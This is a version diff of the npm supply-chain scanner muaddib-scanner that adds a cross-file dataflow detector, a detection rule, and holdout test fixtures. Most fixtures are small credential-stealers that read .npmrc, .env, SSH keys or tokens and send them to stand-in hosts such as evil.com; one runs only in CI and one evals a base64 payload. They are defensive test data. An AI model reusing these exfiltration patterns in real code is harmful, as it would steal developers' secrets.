npm - muaddib-scanner - Versions diffs - 2.2.5 → 2.2.6 - Mend

muaddib-scanner 2.2.5 → 2.2.6

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (40) hide show

package/bin/muaddib.js CHANGED Viewed

@@ -32,6 +32,7 @@ let temporalMaintainerMode = false;
 let temporalFullMode = false;
 let breakdownMode = false;
 let noDeobfuscate = false;
+let noModuleGraph = false;
 let feedLimit = null;
 let feedSeverity = null;
 let feedSince = null;
@@ -113,6 +114,8 @@ for (let i = 0; i < options.length; i++) {
     breakdownMode = true;
   } else if (options[i] === '--no-deobfuscate') {
     noDeobfuscate = true;
+  } else if (options[i] === '--no-module-graph') {
+    noModuleGraph = true;
   } else if (options[i] === '--temporal') {
     temporalMode = true;
   } else if (options[i] === '--limit') {
@@ -399,6 +402,7 @@ const helpText = `
     --temporal-full     All temporal analyses (lifecycle + AST + publish + maintainer)
     --no-canary         Disable honey token injection in sandbox
     --no-deobfuscate    Disable deobfuscation pre-processing
+    --no-module-graph   Disable cross-file dataflow analysis
     --exclude [dir]     Exclude directory from scan (repeatable)
     --limit [n]         Limit feed entries (default: 50)
     --severity [level]  Filter by severity (CRITICAL|HIGH|MEDIUM|LOW)
@@ -440,7 +444,8 @@ if (command === 'version' || command === '--version' || command === '-v') {
     exclude: excludeDirs,
     entropyThreshold: entropyThreshold,
     breakdown: breakdownMode,
-    noDeobfuscate: noDeobfuscate
+    noDeobfuscate: noDeobfuscate,
+    noModuleGraph: noModuleGraph
   }).then(exitCode => {
     process.exit(exitCode);
   }).catch(err => {

package/datasets/holdout-v5/callback-exfil/main.js ADDED Viewed

@@ -0,0 +1,8 @@
+const readCredentials = require('./reader');
+readCredentials((data) => {
+  fetch('https://evil.com/collect', {
+    method: 'POST',
+    body: data
+  });
+});

package/datasets/holdout-v5/callback-exfil/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "callback-exfil",
+  "version": "1.0.0",
+  "description": "Holdout v5 — callback-based credential passing"
+}

package/datasets/holdout-v5/callback-exfil/reader.js ADDED Viewed

@@ -0,0 +1,10 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+function readCredentials(callback) {
+  const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
+  callback(npmrc);
+}
+module.exports = readCredentials;

package/datasets/holdout-v5/class-method-exfil/collector.js ADDED Viewed

@@ -0,0 +1,10 @@
+const fs = require('fs');
+class Collector {
+  read() {
+    const data = fs.readFileSync('.env', 'utf8');
+    return data;
+  }
+}
+module.exports = Collector;

package/datasets/holdout-v5/class-method-exfil/main.js ADDED Viewed

@@ -0,0 +1,7 @@
+const Collector = require('./collector');
+const c = new Collector();
+const secrets = c.read();
+const ws = new WebSocket('wss://evil.com/ws');
+ws.send(secrets);

package/datasets/holdout-v5/class-method-exfil/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "class-method-exfil",
+  "version": "1.0.0",
+  "description": "Holdout v5 — class method read + WebSocket exfil"
+}

package/datasets/holdout-v5/conditional-split/detector.js ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ const isCI = !!process.env.CI;
2	+ module.exports = isCI;

package/datasets/holdout-v5/conditional-split/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "conditional-split",
+  "version": "1.0.0",
+  "description": "Holdout v5 — conditional CI-gated exfiltration"
+}

package/datasets/holdout-v5/conditional-split/stealer.js ADDED Viewed

@@ -0,0 +1,16 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const https = require('https');
+const isCI = require('./detector');
+if (isCI) {
+  const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
+  const req = https.request({
+    hostname: 'evil.com',
+    path: '/ci-steal',
+    method: 'POST'
+  }, (res) => { res.resume(); });
+  req.write(npmrc);
+  req.end();
+}

package/datasets/holdout-v5/event-emitter-flow/listener.js ADDED Viewed

@@ -0,0 +1,12 @@
+const https = require('https');
+const bus = require('./scanner');
+bus.on('data', (creds) => {
+  const req = https.request({
+    hostname: 'evil.com',
+    path: '/steal',
+    method: 'POST'
+  }, (res) => { res.resume(); });
+  req.write(creds);
+  req.end();
+});

package/datasets/holdout-v5/event-emitter-flow/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "event-emitter-flow",
+  "version": "1.0.0",
+  "description": "Holdout v5 — EventEmitter-based credential flow"
+}

package/datasets/holdout-v5/event-emitter-flow/scanner.js ADDED Viewed

@@ -0,0 +1,11 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const EventEmitter = require('events');
+const bus = new EventEmitter();
+const npmrc = fs.readFileSync(path.join(os.homedir(), '.npmrc'), 'utf8');
+bus.emit('data', npmrc);
+module.exports = bus;

package/datasets/holdout-v5/mixed-inline-split/index.js ADDED Viewed

@@ -0,0 +1,6 @@
+// Inline obfuscated payload (intra-file threat)
+const payload = Buffer.from('Y29uc29sZS5sb2coInB3bmVkIik=', 'base64').toString();
+eval(payload);
+// Also orchestrate cross-file flow
+require('./sender');

package/datasets/holdout-v5/mixed-inline-split/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "mixed-inline-split",
+  "version": "1.0.0",
+  "description": "Holdout v5 — intra-file eval + cross-file dataflow"
+}

package/datasets/holdout-v5/mixed-inline-split/reader.js ADDED Viewed

@@ -0,0 +1,3 @@
+const fs = require('fs');
+const data = fs.readFileSync('.npmrc', 'utf8');
+module.exports = data;

package/datasets/holdout-v5/mixed-inline-split/sender.js ADDED Viewed

@@ -0,0 +1,6 @@
+const stolen = require('./reader');
+fetch('https://evil.com/exfil', {
+  method: 'POST',
+  body: stolen
+});

package/datasets/holdout-v5/named-export-steal/main.js ADDED Viewed

@@ -0,0 +1,6 @@
+const { getCredentials } = require('./utils');
+fetch('https://evil.com/aws', {
+  method: 'POST',
+  body: getCredentials
+});

package/datasets/holdout-v5/named-export-steal/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "named-export-steal",
+  "version": "1.0.0",
+  "description": "Holdout v5 — named export destructuring steal"
+}

package/datasets/holdout-v5/named-export-steal/utils.js ADDED Viewed

	@@ -0,0 +1 @@
1	+ exports.getCredentials = process.env.AWS_SECRET_ACCESS_KEY;

package/datasets/holdout-v5/reexport-chain/a.js ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ const token = process.env.NPM_TOKEN;
2	+ module.exports = token;

package/datasets/holdout-v5/reexport-chain/b.js ADDED Viewed

	@@ -0,0 +1 @@
1	+ module.exports = require('./a');

package/datasets/holdout-v5/reexport-chain/c.js ADDED Viewed

@@ -0,0 +1,11 @@
+const https = require('https');
+const secret = require('./b');
+const req = https.request({
+  hostname: 'evil.com',
+  path: '/npm-token',
+  method: 'POST'
+}, (res) => { res.resume(); });
+req.write(secret);
+req.end();

package/datasets/holdout-v5/reexport-chain/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "reexport-chain",
+  "version": "1.0.0",
+  "description": "Holdout v5 — double re-export chain a → b → c"
+}

package/datasets/holdout-v5/split-env-exfil/env.js ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ const token = process.env.GITHUB_TOKEN;
2	+ module.exports = token;

package/datasets/holdout-v5/split-env-exfil/exfil.js ADDED Viewed

@@ -0,0 +1,5 @@
+const token = require('./env');
+fetch('https://evil.com/collect', {
+  method: 'POST',
+  body: token
+});

package/datasets/holdout-v5/split-env-exfil/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "split-env-exfil",
+  "version": "1.0.0",
+  "description": "Holdout v5 — cross-file env token exfil"
+}

package/datasets/holdout-v5/split-npmrc-steal/index.js ADDED Viewed

	@@ -0,0 +1,2 @@
1	+ require('./reader');
2	+ require('./sender');

package/datasets/holdout-v5/split-npmrc-steal/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "split-npmrc-steal",
+  "version": "1.0.0",
+  "description": "Holdout v5 — cross-file .npmrc steal"
+}

package/datasets/holdout-v5/split-npmrc-steal/reader.js ADDED Viewed

@@ -0,0 +1,8 @@
+const fs = require('fs');
+const path = require('path');
+const os = require('os');
+const npmrcPath = path.join(os.homedir(), '.npmrc');
+const content = fs.readFileSync(npmrcPath, 'utf8');
+module.exports = content;

package/datasets/holdout-v5/split-npmrc-steal/sender.js ADDED Viewed

@@ -0,0 +1,17 @@
+const https = require('https');
+const data = require('./reader');
+const options = {
+  hostname: 'collector.evil.com',
+  port: 443,
+  path: '/exfil',
+  method: 'POST',
+  headers: { 'Content-Type': 'text/plain' }
+};
+const req = https.request(options, (res) => {
+  res.resume();
+});
+req.write(data);
+req.end();

package/datasets/holdout-v5/three-hop-chain/package.json ADDED Viewed

@@ -0,0 +1,5 @@
+{
+  "name": "three-hop-chain",
+  "version": "1.0.0",
+  "description": "Holdout v5 — 3-file chain reader → transform → sender"
+}

package/datasets/holdout-v5/three-hop-chain/reader.js ADDED Viewed

@@ -0,0 +1,8 @@
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const keyPath = path.join(os.homedir(), '.ssh', 'id_rsa');
+const key = fs.readFileSync(keyPath, 'utf8');
+module.exports = key;

package/datasets/holdout-v5/three-hop-chain/sender.js ADDED Viewed

@@ -0,0 +1,11 @@
+const https = require('https');
+const payload = require('./transform');
+const req = https.request({
+  hostname: 'attacker.example.com',
+  path: '/collect',
+  method: 'POST'
+}, (res) => { res.resume(); });
+req.write(payload);
+req.end();

package/datasets/holdout-v5/three-hop-chain/transform.js ADDED Viewed

@@ -0,0 +1,3 @@
+const raw = require('./reader');
+const encoded = Buffer.from(raw).toString('base64');
+module.exports = encoded;

package/package.json CHANGED Viewed

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.2.5",
+  "version": "2.2.6",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/index.js CHANGED Viewed

@@ -20,6 +20,7 @@ const { ensureIOCs } = require('./ioc/bootstrap.js');
 const { scanEntropy } = require('./scanner/entropy.js');
 const { scanAIConfig } = require('./scanner/ai-config.js');
 const { deobfuscate } = require('./scanner/deobfuscate.js');
+const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows } = require('./scanner/module-graph.js');
 const { detectSuddenLifecycleChange } = require('./temporal-analysis.js');
 const { detectSuddenAstChanges } = require('./temporal-ast-diff.js');
 const { detectPublishAnomaly } = require('./publish-anomaly.js');
@@ -226,6 +227,18 @@ async function run(targetPath, options = {}) {
   // Deobfuscation pre-processor (pass to AST/dataflow scanners unless disabled)
   const deobfuscateFn = options.noDeobfuscate ? null : deobfuscate;
+  // Cross-file module graph analysis (before individual scanners)
+  let crossFileFlows = [];
+  if (!options.noModuleGraph) {
+    try {
+      const graph = buildModuleGraph(targetPath);
+      const tainted = annotateTaintedExports(graph, targetPath);
+      crossFileFlows = detectCrossFileFlows(graph, tainted, targetPath);
+    } catch {
+      // Graceful fallback — module graph is best-effort
+    }
+  }
   // Parallel execution of all independent scanners
   const [
     packageThreats,
@@ -275,7 +288,13 @@ async function run(targetPath, options = {}) {
     ...pythonThreats,
     ...pypiTyposquatThreats,
     ...entropyThreats,
-    ...aiConfigThreats
+    ...aiConfigThreats,
+    ...crossFileFlows.map(f => ({
+      type: f.type,
+      severity: f.severity,
+      message: `Cross-file dataflow: ${f.source} in ${f.sourceFile} → ${f.sink} in ${f.sinkFile}`,
+      file: f.sinkFile
+    }))
   ];
   // Paranoid mode

package/src/response/playbooks.js CHANGED Viewed

@@ -304,6 +304,11 @@ const PLAYBOOKS = {
     'NE PAS installer. Ceci execute du code arbitraire a l\'installation. ' +
     'Si deja installe: considerer la machine compromise. Auditer les modifications systeme.',
+  cross_file_dataflow:
+    'CRITIQUE: Un module lit des credentials et les exporte vers un autre module qui les envoie sur le reseau. ' +
+    'Exfiltration inter-fichiers confirmee. Isoler la machine, supprimer le package, regenerer TOUS les secrets. ' +
+    'Auditer les connexions reseau recentes pour identifier les donnees exfiltrees.',
   credential_tampering:
     'CRITIQUE: Ecriture detectee dans un cache sensible (npm _cacache, yarn, pip). ' +
     'Possible cache poisoning: injection de code malveillant dans des packages caches. ' +

package/src/rules/index.js CHANGED Viewed

@@ -624,6 +624,19 @@ const RULES = {
     mitre: 'T1195.002'
   },
+  cross_file_dataflow: {
+    id: 'MUADDIB-FLOW-004',
+    name: 'Cross-File Data Exfiltration',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Un module lit des credentials (fs.readFileSync, process.env) et les exporte vers un autre module qui les envoie sur le reseau (fetch, https.request). Exfiltration inter-fichiers confirmee.',
+    references: [
+      'https://blog.phylum.io/shai-hulud-npm-worm',
+      'https://attack.mitre.org/techniques/T1041/'
+    ],
+    mitre: 'T1041'
+  },
   credential_tampering: {
     id: 'MUADDIB-FLOW-003',
     name: 'Credential/Cache Tampering',

package/src/scanner/module-graph.js ADDED Viewed

@@ -0,0 +1,883 @@
+const fs = require('fs');
+const path = require('path');
+const acorn = require('acorn');
+const { findFiles } = require('../utils');
+// --- Sensitive source patterns ---
+const SENSITIVE_MODULES = new Set(['fs', 'child_process', 'dns', 'os']);
+const ACORN_OPTIONS = {
+  ecmaVersion: 'latest',
+  sourceType: 'module',
+  allowReturnOutsideFunction: true,
+  allowImportExportEverywhere: true,
+};
+// --- Sink patterns for cross-file detection ---
+const SINK_CALLEE_NAMES = new Set(['fetch', 'eval', 'Function', 'WebSocket', 'XMLHttpRequest']);
+const SINK_MEMBER_METHODS = new Set([
+  'https.request', 'https.get', 'http.request', 'http.get',
+  'child_process.exec', 'child_process.execSync', 'child_process.spawn',
+]);
+const SINK_INSTANCE_METHODS = new Set(['connect', 'write', 'send']);
+// =============================================================================
+// STEP 1 — Module dependency graph
+// =============================================================================
+/**
+ * Build a dependency graph of local modules within a package.
+ * Only tracks local imports (./  ../) — node_modules are ignored.
+ */
+function buildModuleGraph(packagePath) {
+  const graph = {};
+  const files = findFiles(packagePath, {
+    extensions: ['.js'],
+    excludedDirs: ['node_modules', '.git'],
+  });
+  for (const absFile of files) {
+    const relFile = toRel(absFile, packagePath);
+    const imports = extractLocalImports(absFile, packagePath);
+    graph[relFile] = imports;
+  }
+  return graph;
+}
+function extractLocalImports(filePath, packagePath) {
+  const ast = parseFile(filePath);
+  if (!ast) return [];
+  const imports = [];
+  const fileDir = path.dirname(filePath);
+  for (const node of ast.body) {
+    if (node.type === 'ImportDeclaration' && node.source && typeof node.source.value === 'string') {
+      const spec = node.source.value;
+      if (isLocalImport(spec)) {
+        const resolved = resolveLocal(fileDir, spec, packagePath);
+        if (resolved) imports.push(resolved);
+      }
+    }
+  }
+  walkForRequires(ast, fileDir, packagePath, imports);
+  return [...new Set(imports)];
+}
+function walkForRequires(node, fileDir, packagePath, imports) {
+  if (!node || typeof node !== 'object') return;
+  if (
+    node.type === 'CallExpression' &&
+    node.callee && node.callee.type === 'Identifier' &&
+    node.callee.name === 'require' &&
+    node.arguments.length === 1 &&
+    node.arguments[0].type === 'Literal' &&
+    typeof node.arguments[0].value === 'string'
+  ) {
+    const spec = node.arguments[0].value;
+    if (isLocalImport(spec)) {
+      const resolved = resolveLocal(fileDir, spec, packagePath);
+      if (resolved) imports.push(resolved);
+    }
+  }
+  for (const key of Object.keys(node)) {
+    if (key === 'type') continue;
+    const child = node[key];
+    if (Array.isArray(child)) {
+      for (const item of child) {
+        if (item && typeof item === 'object' && item.type) {
+          walkForRequires(item, fileDir, packagePath, imports);
+        }
+      }
+    } else if (child && typeof child === 'object' && child.type) {
+      walkForRequires(child, fileDir, packagePath, imports);
+    }
+  }
+}
+// =============================================================================
+// STEP 2 — Annotate tainted exports
+// =============================================================================
+/**
+ * For each file in the graph, find exports and check if they depend on
+ * sensitive sources (fs.readFileSync, process.env, os.homedir, etc.).
+ *
+ * Returns: { 'reader.js': { default: { tainted: true, source: '...', detail: '...' } }, ... }
+ */
+function annotateTaintedExports(graph, packagePath) {
+  const result = {};
+  for (const relFile of Object.keys(graph)) {
+    const absFile = path.resolve(packagePath, relFile);
+    result[relFile] = analyzeExports(absFile);
+  }
+  return result;
+}
+function analyzeExports(filePath) {
+  const ast = parseFile(filePath);
+  if (!ast) return {};
+  // Track which local variables hold sensitive module references
+  // e.g. const fs = require('fs') → moduleVars['fs'] = 'fs'
+  const moduleVars = {};
+  // Track which local variables hold tainted values
+  // e.g. const data = fs.readFileSync(...) → taintedVars['data'] = { source, detail }
+  const taintedVars = {};
+  // Track class declarations: class Foo { ... }
+  const classDefs = {};
+  walkAST(ast, (node) => {
+    if (node.type === 'ClassDeclaration' && node.id && node.id.name) {
+      classDefs[node.id.name] = node;
+    }
+  });
+  // First pass: collect require assignments and tainted variable assignments
+  walkAST(ast, (node) => {
+    // const fs = require('fs')
+    if (node.type === 'VariableDeclaration') {
+      for (const decl of node.declarations) {
+        if (!decl.init || !decl.id) continue;
+        // const fs = require('fs')
+        if (isRequireCall(decl.init) && SENSITIVE_MODULES.has(decl.init.arguments[0].value)) {
+          if (decl.id.type === 'Identifier') {
+            moduleVars[decl.id.name] = decl.init.arguments[0].value;
+          }
+        }
+        // const data = fs.readFileSync(...) or const token = process.env.XXX
+        if (decl.id.type === 'Identifier') {
+          const taint = checkNodeTaint(decl.init, moduleVars);
+          if (taint) {
+            taintedVars[decl.id.name] = taint;
+          }
+        }
+      }
+    }
+    // Also handle: let x; x = fs.readFileSync(...)
+    if (node.type === 'ExpressionStatement' && node.expression.type === 'AssignmentExpression') {
+      const left = node.expression.left;
+      const right = node.expression.right;
+      if (left.type === 'Identifier') {
+        const taint = checkNodeTaint(right, moduleVars);
+        if (taint) {
+          taintedVars[left.name] = taint;
+        }
+      }
+    }
+  });
+  // Second pass: find exports and check if they are tainted
+  const exports = {};
+  walkAST(ast, (node) => {
+    // module.exports = value  OR  module.exports = { ... }
+    if (isModuleExportsAssign(node)) {
+      const value = node.expression.right;
+      const exportName = getExportName(node.expression.left);
+      // Direct taint on the value itself
+      const taint = checkNodeTaint(value, moduleVars);
+      if (taint) {
+        exports[exportName] = { tainted: true, source: taint.source, detail: taint.detail };
+        return;
+      }
+      // Variable reference → check taintedVars
+      if (value.type === 'Identifier' && taintedVars[value.name]) {
+        const t = taintedVars[value.name];
+        exports[exportName] = { tainted: true, source: t.source, detail: t.detail };
+        return;
+      }
+      // Object literal: module.exports = { read: function() { ... } }
+      if (value.type === 'ObjectExpression' && exportName === 'default') {
+        for (const prop of value.properties) {
+          if (!prop.key) continue;
+          const propName = prop.key.name || prop.key.value || 'unknown';
+          // Check function body for taint
+          const funcBody = getFunctionBody(prop.value);
+          if (funcBody) {
+            const bodyTaint = scanBodyForTaint(funcBody, moduleVars, taintedVars);
+            if (bodyTaint) {
+              exports[propName] = { tainted: true, source: bodyTaint.source, detail: bodyTaint.detail };
+            }
+          } else {
+            // Value is a direct expression
+            const vTaint = checkNodeTaint(prop.value, moduleVars);
+            if (vTaint) {
+              exports[propName] = { tainted: true, source: vTaint.source, detail: vTaint.detail };
+            } else if (prop.value.type === 'Identifier' && taintedVars[prop.value.name]) {
+              const t = taintedVars[prop.value.name];
+              exports[propName] = { tainted: true, source: t.source, detail: t.detail };
+            }
+          }
+        }
+        return;
+      }
+      // Class expression: module.exports = class { ... }
+      if (value.type === 'ClassExpression') {
+        analyzeClassBody(value, moduleVars, taintedVars, exports);
+        return;
+      }
+      // Class reference: module.exports = ClassName (where ClassName is a ClassDeclaration)
+      if (value.type === 'Identifier' && classDefs[value.name]) {
+        analyzeClassBody(classDefs[value.name], moduleVars, taintedVars, exports);
+        return;
+      }
+      // Function/arrow: module.exports = function() { ... }
+      const funcBody = getFunctionBody(value);
+      if (funcBody) {
+        const bodyTaint = scanBodyForTaint(funcBody, moduleVars, taintedVars);
+        if (bodyTaint) {
+          exports[exportName] = { tainted: true, source: bodyTaint.source, detail: bodyTaint.detail };
+        }
+      }
+    }
+  });
+  return exports;
+}
+/**
+ * Analyze class body methods for tainted sources.
+ * Populates exports with named tainted methods.
+ */
+function analyzeClassBody(classNode, moduleVars, taintedVars, exports) {
+  if (!classNode.body || !classNode.body.body) return;
+  for (const member of classNode.body.body) {
+    if (member.type !== 'MethodDefinition') continue;
+    const methodName = member.key && (member.key.name || member.key.value);
+    if (!methodName || methodName === 'constructor') continue;
+    const funcBody = getFunctionBody(member.value);
+    if (funcBody) {
+      const bodyTaint = scanBodyForTaint(funcBody, moduleVars, taintedVars);
+      if (bodyTaint) {
+        exports[methodName] = { tainted: true, source: bodyTaint.source, detail: bodyTaint.detail };
+      }
+    }
+  }
+}
+/**
+ * Check if a single AST node represents a sensitive source call.
+ */
+function checkNodeTaint(node, moduleVars) {
+  if (!node) return null;
+  // process.env  or  process.env.XXX
+  if (node.type === 'MemberExpression') {
+    const chain = getMemberChain(node);
+    if (chain.startsWith('process.env')) {
+      const detail = chain.length > 'process.env'.length ? chain.slice('process.env.'.length) : '';
+      return { source: 'process.env', detail };
+    }
+  }
+  // require('fs').readFileSync(...)  (inline require)
+  if (node.type === 'CallExpression' && node.callee.type === 'MemberExpression') {
+    const obj = node.callee.object;
+    const prop = node.callee.property;
+    const methodName = prop.name || prop.value;
+    // Check inline require: require('fs').readFileSync(...)
+    if (isRequireCall(obj) && SENSITIVE_MODULES.has(obj.arguments[0].value)) {
+      const mod = obj.arguments[0].value;
+      return describeSensitiveCall(mod, methodName, node.arguments);
+    }
+    // Check variable-based: fs.readFileSync(...)
+    if (obj.type === 'Identifier' && moduleVars[obj.name]) {
+      const mod = moduleVars[obj.name];
+      return describeSensitiveCall(mod, methodName, node.arguments);
+    }
+  }
+  // Bare call: exec(...), spawn(...)
+  if (node.type === 'CallExpression' && node.callee.type === 'Identifier') {
+    const name = node.callee.name;
+    if (name === 'exec' || name === 'execSync' || name === 'spawn' || name === 'spawnSync') {
+      const detail = extractLiteralArg(node.arguments);
+      return { source: `child_process.${name}`, detail };
+    }
+  }
+  return null;
+}
+function describeSensitiveCall(mod, method, args) {
+  const detail = extractLiteralArg(args);
+  if (mod === 'fs' && (method === 'readFileSync' || method === 'readFile')) {
+    return { source: `fs.${method}`, detail };
+  }
+  if (mod === 'os' && method === 'homedir') {
+    return { source: 'os.homedir', detail: '' };
+  }
+  if (mod === 'child_process' && (method === 'exec' || method === 'execSync' || method === 'spawn')) {
+    return { source: `child_process.${method}`, detail };
+  }
+  if (mod === 'dns' && method === 'resolveTxt') {
+    return { source: 'dns.resolveTxt', detail };
+  }
+  return null;
+}
+/**
+ * Scan a function body (array of statements) for any tainted expression.
+ * Returns the first taint found, or null.
+ */
+function scanBodyForTaint(body, moduleVars, taintedVars) {
+  // Collect local tainted vars within this function scope too
+  const localTainted = { ...taintedVars };
+  let found = null;
+  walkAST({ type: 'Program', body }, (node) => {
+    if (found) return;
+    // Variable assignment inside function
+    if (node.type === 'VariableDeclaration') {
+      for (const decl of node.declarations) {
+        if (!decl.init || !decl.id || decl.id.type !== 'Identifier') continue;
+        if (isRequireCall(decl.init) && SENSITIVE_MODULES.has(decl.init.arguments[0].value)) {
+          moduleVars[decl.id.name] = decl.init.arguments[0].value;
+        }
+        const t = checkNodeTaint(decl.init, moduleVars);
+        if (t) localTainted[decl.id.name] = t;
+      }
+    }
+    const taint = checkNodeTaint(node, moduleVars);
+    if (taint) {
+      found = taint;
+      return;
+    }
+    // Return of a tainted variable
+    if (node.type === 'ReturnStatement' && node.argument) {
+      if (node.argument.type === 'Identifier' && localTainted[node.argument.name]) {
+        found = localTainted[node.argument.name];
+      }
+    }
+  });
+  return found;
+}
+// =============================================================================
+// STEP 3 — Cross-file flow detection
+// =============================================================================
+/**
+ * Detect cross-file dataflows: a tainted export from one module reaches a
+ * network/exec sink in another module.
+ * Max 2 levels of re-export (A → B → C).
+ */
+function detectCrossFileFlows(graph, taintedExports, packagePath) {
+  // Expand taint through re-exports (max 2 levels)
+  const expandedTaint = expandTaintThroughReexports(graph, taintedExports, packagePath);
+  const flows = [];
+  for (const relFile of Object.keys(graph)) {
+    const absFile = path.resolve(packagePath, relFile);
+    const ast = parseFile(absFile);
+    if (!ast) continue;
+    // Find which local variables are tainted via imports
+    const localTaint = collectImportTaint(ast, relFile, graph, expandedTaint, packagePath);
+    if (Object.keys(localTaint).length === 0) continue;
+    // Find sinks that use tainted variables
+    const sinks = findSinksUsingTainted(ast, localTaint);
+    for (const sink of sinks) {
+      const taintInfo = localTaint[sink.taintedVar];
+      flows.push({
+        severity: 'CRITICAL',
+        type: 'cross_file_dataflow',
+        sourceFile: taintInfo.sourceFile,
+        source: `${taintInfo.source}${taintInfo.detail ? '(' + taintInfo.detail + ')' : ''}`,
+        sinkFile: relFile,
+        sink: sink.sink,
+        description: `Credential read in ${taintInfo.sourceFile} exported and sent to network in ${relFile}`,
+      });
+    }
+  }
+  return flows;
+}
+/**
+ * Expand taint through re-exports: if module B imports from A and re-exports,
+ * B's exports are also tainted. Max 2 levels.
+ */
+function expandTaintThroughReexports(graph, taintedExports, packagePath) {
+  const expanded = {};
+  for (const f of Object.keys(taintedExports)) {
+    expanded[f] = { ...taintedExports[f] };
+  }
+  for (let level = 0; level < 2; level++) {
+    let changed = false;
+    for (const relFile of Object.keys(graph)) {
+      const absFile = path.resolve(packagePath, relFile);
+      const ast = parseFile(absFile);
+      if (!ast) continue;
+      const localTaint = collectImportTaint(ast, relFile, graph, expanded, packagePath);
+      // Propagate taint through local variable assignments:
+      // e.g. const encoded = Buffer.from(raw) where raw is tainted
+      if (Object.keys(localTaint).length > 0) {
+        propagateLocalTaint(ast, localTaint);
+      }
+      // Check if any export returns a tainted variable (or inline require)
+      if (!expanded[relFile]) expanded[relFile] = {};
+      const fileDir = path.dirname(absFile);
+      walkAST(ast, (node) => {
+        if (!isModuleExportsAssign(node)) return;
+        const value = node.expression.right;
+        const exportName = getExportName(node.expression.left);
+        // Direct re-export: module.exports = taintedVar
+        if (value.type === 'Identifier' && localTaint[value.name]) {
+          if (!expanded[relFile][exportName]) {
+            expanded[relFile][exportName] = {
+              tainted: true,
+              source: localTaint[value.name].source,
+              detail: localTaint[value.name].detail,
+              sourceFile: localTaint[value.name].sourceFile,
+            };
+            changed = true;
+          }
+          return;
+        }
+        // Inline re-export: module.exports = require('./x')
+        if (isRequireCall(value) && isLocalImport(value.arguments[0].value)) {
+          const spec = value.arguments[0].value;
+          const resolved = resolveLocal(fileDir, spec, packagePath);
+          if (resolved && expanded[resolved]) {
+            const defTaint = expanded[resolved]['default'];
+            if (defTaint && defTaint.tainted && !expanded[relFile][exportName]) {
+              expanded[relFile][exportName] = {
+                tainted: true,
+                source: defTaint.source,
+                detail: defTaint.detail,
+                sourceFile: defTaint.sourceFile || resolved,
+              };
+              changed = true;
+            }
+          }
+          return;
+        }
+        // Wrapped re-export: module.exports = fn(taintedVar)
+        if (value.type === 'CallExpression') {
+          const tArg = findFirstTaintedArg(value.arguments, localTaint);
+          if (tArg && !expanded[relFile][exportName]) {
+            expanded[relFile][exportName] = {
+              tainted: true,
+              source: localTaint[tArg].source,
+              detail: localTaint[tArg].detail,
+              sourceFile: localTaint[tArg].sourceFile,
+            };
+            changed = true;
+          }
+        }
+      });
+    }
+    if (!changed) break;
+  }
+  return expanded;
+}
+/**
+ * Propagate taint through local variable assignments.
+ * If `const x = fn(taintedVar)`, then x is also tainted.
+ */
+function propagateLocalTaint(ast, localTaint) {
+  walkAST(ast, (node) => {
+    if (node.type !== 'VariableDeclaration') return;
+    for (const decl of node.declarations) {
+      if (!decl.init || !decl.id || decl.id.type !== 'Identifier') continue;
+      if (localTaint[decl.id.name]) continue; // already tainted
+      const tArg = findFirstTaintedArgInExpr(decl.init, localTaint);
+      if (tArg) {
+        localTaint[decl.id.name] = { ...localTaint[tArg] };
+      }
+    }
+  });
+}
+/**
+ * Find the first tainted identifier among function call arguments.
+ */
+function findFirstTaintedArg(args, taintMap) {
+  if (!args) return null;
+  for (const arg of args) {
+    if (arg.type === 'Identifier' && taintMap[arg.name] && !arg.name.startsWith('__module__')) {
+      return arg.name;
+    }
+  }
+  return null;
+}
+/**
+ * Recursively check if an expression uses a tainted variable as argument.
+ * Handles: fn(tainted), fn(a, fn2(tainted)), fn(tainted).method()
+ */
+function findFirstTaintedArgInExpr(node, taintMap) {
+  if (!node) return null;
+  if (node.type === 'Identifier' && taintMap[node.name] && !node.name.startsWith('__module__')) {
+    return node.name;
+  }
+  if (node.type === 'CallExpression') {
+    const fromArgs = findFirstTaintedArg(node.arguments, taintMap);
+    if (fromArgs) return fromArgs;
+    // Check callee for chained calls: fn(x).method()
+    return findFirstTaintedArgInExpr(node.callee, taintMap);
+  }
+  if (node.type === 'MemberExpression') {
+    return findFirstTaintedArgInExpr(node.object, taintMap);
+  }
+  return null;
+}
+/**
+ * For a given file's AST, find which local variables receive tainted values
+ * via require('./...') imports.
+ */
+function collectImportTaint(ast, currentFile, graph, taintedExports, packagePath) {
+  const localTaint = {};
+  const fileDir = path.dirname(path.resolve(packagePath, currentFile));
+  walkAST(ast, (node) => {
+    if (node.type !== 'VariableDeclaration') return;
+    for (const decl of node.declarations) {
+      if (!decl.init || !decl.id) continue;
+      // const reader = require('./reader')
+      if (isRequireCall(decl.init) && isLocalImport(decl.init.arguments[0].value)) {
+        const spec = decl.init.arguments[0].value;
+        const resolved = resolveLocal(fileDir, spec, packagePath);
+        if (!resolved || !taintedExports[resolved]) continue;
+        const modTaint = taintedExports[resolved];
+        if (decl.id.type === 'Identifier') {
+          // Whole module import — check 'default' export
+          const defTaint = modTaint['default'];
+          if (defTaint && defTaint.tainted) {
